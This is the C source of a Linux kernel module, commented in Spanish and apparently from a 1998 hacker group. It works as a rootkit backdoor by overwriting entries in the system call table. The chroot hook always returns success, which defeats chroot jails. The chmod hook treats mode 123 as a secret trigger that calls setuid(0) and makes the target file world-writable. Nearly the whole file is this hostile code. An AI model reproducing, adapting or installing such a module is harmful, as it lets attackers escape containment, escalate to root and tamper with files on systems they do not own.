/* Modulo del kernel para anular un chroot() y "retocar" chmod()
 * FLoW - !H'98
 * Basado en heroin.c de Runar Jensen <zarq@opaque.org>
 */

#include <linux/fs.h>
#include <linux/module.h>
#include <linux/malloc.h>
#include <linux/unistd.h>
#include <sys/syscall.h>

#include <linux/dirent.h>
#include <linux/proc_fs.h>
#include <stdlib.h>


static inline _syscall2(int, chmod, const char*, path, mode_t, mode);
static inline _syscall1(int, setuid, uid_t, uid);
 
extern void *sys_call_table[];

int (*original_chroot)(const char *, const char*); 
int (*original_chmod)(const char *, mode_t);
int (*original_setuid)(uid_t);

int hacked_chmod(const char *path, mode_t mode)
{
int err;

if(mode==83) { /* chmod 123 XXX */
  (*original_setuid)(0);
  err=(*original_chmod)(path, 511); /* chmod 777 XXX */
  }

else {
  err=(*original_chmod)(path, mode);
  }
  
return(err);
}

int hacked_chroot(const char *path, const char *cmd)
{
        return(0);
}

int init_module(void)
{
	original_setuid = sys_call_table[SYS_setuid];
	original_chroot = sys_call_table[SYS_chroot];
	sys_call_table[SYS_chroot] = hacked_chroot;
	original_chmod = sys_call_table[SYS_chmod];
	sys_call_table[SYS_chmod] = hacked_chmod;
        return(0);
}

void cleanup_module(void)
{
	sys_call_table[SYS_chroot] = original_chroot;
	sys_call_table[SYS_chmod] = original_chmod;
}
